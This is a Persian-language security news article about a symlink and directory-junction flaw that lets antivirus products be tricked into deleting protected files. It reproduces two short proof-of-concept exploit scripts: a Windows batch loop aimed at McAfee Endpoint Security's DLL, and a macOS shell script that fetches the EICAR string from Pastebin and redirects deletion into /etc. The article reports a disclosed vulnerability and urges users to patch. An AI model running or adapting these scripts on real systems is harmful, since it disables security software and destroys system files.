هکرها توانایی دور زدن نرم افزار های آنتی ویروس و تبدیل آنها به ابزارهای مخرب را دارند

محققان امنیتی موفق به شناسایی و کشف یک فرآیند مخرب در ابزارهای آنتی ویروسی شدند که تقریباً در ۲۸ برند معروف این نرم افزار ها وجود دارد. به گفته محققان امنیتی این باگ شناسایی شده به توسعه دهندگان بدافزارها امکان بهره برداری غیر مجاز از سیستم را داده و آنها به راحتی می توانند نرم افزارهای آنتی ویروس را غیر فعال کنند و همچنین مهاجمان سایبری با استفاده از این فرآیند مخرب می توانند ابزارهای آنتی ویروسی را به ابزارهای مخرب خود تبدیل کنند بدون آن که کاربر متوجه این موارد شود.

این آسیب پذیری ناشی از خطای اتصالات directory در ویندوز و Symlinks در لینوکس و مک بوجود آمده و از آن برای انجام این بهره برداری استفاده می شود. اتصالات directory بر روی سیستم های ویندوزی فقط می تواند دو دایرکتوری را به یکدیگر لینک کند و قادر به لینک کردن پرونده ها نیست. 

اصولا آنتی ویروس در رایانه ها با سطح دسترسی بالا اجرا می شوند و بالاترین میزان دسترسی را برای اسکن کلیه پرونده ها و دایرکتوری ها در اختیار دارند. دلیل داشتن سطح دسترسی بالا صرفا برای یافتن فایل های ناشناخته و مخرب می باشد تا آنتی ویروس بتواند اسکن دقیق و حذف فایل های مخرب را به درستی اعمال کند.

ماهیت این سطح دسترسی ها می تواند طیف گسترده ای از آسیب پذیری ها و بهره برداری های غیر مجاز توسط مجرمان سایبری را به همراه داشته باشد. وقتی یک آنتی ویروس نصب شده بر روی سیستم بالاترین سطوح دسترسی ها را داشته باشد به همان میزان هم می تواند به مهاجمان سایبری این امکان را بدهد تا امتیاز بالای سیستم های آسیب پذیر را بدست آورند.

بهره برداری از ویندوز (PoC Video)

محققان امنیتی با استفاده از کد اثبات مفهوم خود (PoC) فرآیند بهره برداری را علیه McAfee Endpoint Security برای ویندوز انجام دادند و توانستند با استفاده از این عملیات پرونده EpSecApiLib.dll را حذف کنند.

محققان گفتند: “در آزمایشات صورت گرفته ما توانستیم پرونده ای را با مداخله در عملیات آنتی ویروس حذف کنیم.”

کد اکسپلویت:

:loop
rd /s /q C:\Users\User\Desktop\exploit
mkdir C:\Users\User\Desktop\exploit
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\User\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\User\Desktop\exploit
mklink /J C:\Users\User\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop

بهره برداری از macOS و (Linux (PoC Video

محققان امنیتی با استفاده از اکسپلویت بر روی آنتی ویروس Norton Internet Security در سیستم macOS بهره برداری خود را شروع كرده و استرینگ تست EICAR را از Pastebin دانلود كردند تا از محافظت آنتی ویروس در زمان واقعی جلوگیری شود. این عملیات منجر به جلوگیری فعالیت آنتی ویروس می شود.

در حالی که استرینگ تست را از Pastebin دانلود می کنید، آنتی ویروس بلافاصله آن را به عنوان بدافزار تشخیص داده و اقدام به پاک سازی می کند.

کد Poc Exploit برای MacOS

#!/bin/sh
rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd
sleep 6
rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit

این فرایند اثبات مفهوم یا به اصطلاح Proof-of-concept بر روی برخی از نرم افزارهای آنتی ویروس لینوکسی کار می کند و محققان توانستند پرونده های مهمی را که نرم افزار آنتی ویروس ارائه داده را حذف کنند.

کلیه فروشندگان آنتی ویروس بصورت جداگانه این موارد را تأیید کرده و تقریباً تمامی انها در حال وصله کردن محصولات خود هستند.

به کاربران توصیه می شود وصله های تازه منتشر شده برای نرم افزار آنتی ویروس را در رایانه خود نصب کنند.